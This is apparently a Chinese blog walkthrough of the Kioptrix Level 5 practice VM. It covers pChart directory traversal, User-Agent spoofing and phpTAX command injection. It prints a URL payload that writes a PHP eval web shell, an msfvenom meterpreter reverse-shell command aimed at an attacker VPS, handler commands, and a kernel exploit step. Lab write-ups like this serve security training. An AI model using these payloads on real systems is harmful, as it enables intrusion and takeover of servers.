您现在的位置是:首页 >技术杂谈 >KIOPTRIX: LEVEL 5通关详解网站首页技术杂谈

KIOPTRIX: LEVEL 5通关详解

丨Arcueid丨 2023-05-16 16:00:02
简介KIOPTRIX: LEVEL 5通关详解

环境配置

在这里插入图片描述

虚拟机网络适配器删了重新上一个就行

信息收集

在这里插入图片描述
在这里插入图片描述

漏洞发现

两个端口的web页面都没有显著的特征,尝试扫描路径,也没有扫到有价值的信息
8080端口访问被拒绝
在80端口的web页面源码中发现信息
在这里插入图片描述
访问
在这里插入图片描述
注意到title是pChart
在这里插入图片描述
尝试利用
在这里插入图片描述
可以知道有目录穿越和xss
我们可以尝试去读取apache的配置文件
在这里插入图片描述
在这里插入图片描述
这时可以知道只有UA相同才能访问
那么改UA再访问
在这里插入图片描述
用UA Switcher来伪造UA
在这里插入图片描述
这是一个phpTAX searchsploit搜一手
在这里插入图片描述在这里插入图片描述
试试反弹个shell
用了nc bash php python等方法反弹均失败
那么试试执行id > 1.txt
可以在1.txt中读到命令执行内容
在这里插入图片描述
写个一句话
http://192.168.45.139:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php eval($_REQUEST[1]);?>" > shell.php;&pdf=make
然后蚁键连上拿虚拟终端

尝试用msf生成稳点的shell
msfvenom -p php/meterpreter/reverse_tcp lhost=vps地址 lport=9000
将生成的内容写入a.php
在这里插入图片描述
在这里插入图片描述

chmod +x a.php```
然后msf打开

```bash
use exploits/multi/handler
use payload php/meterpreter/reverse_tcp
run

php a.php 提示nosocket
那直接访问a.php呢
也是no socket

尝试使用kali自带的shell,存放在/usr/share/webshell/php/php-reverse-shell.php
在这里插入图片描述
再访问a.php
成功拿到稳定的shell

提权

下载LinEnum.sh枚举脆弱性

尝试内核提权
在这里插入图片描述
在这里插入图片描述
用26368.c
在这里插入图片描述

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。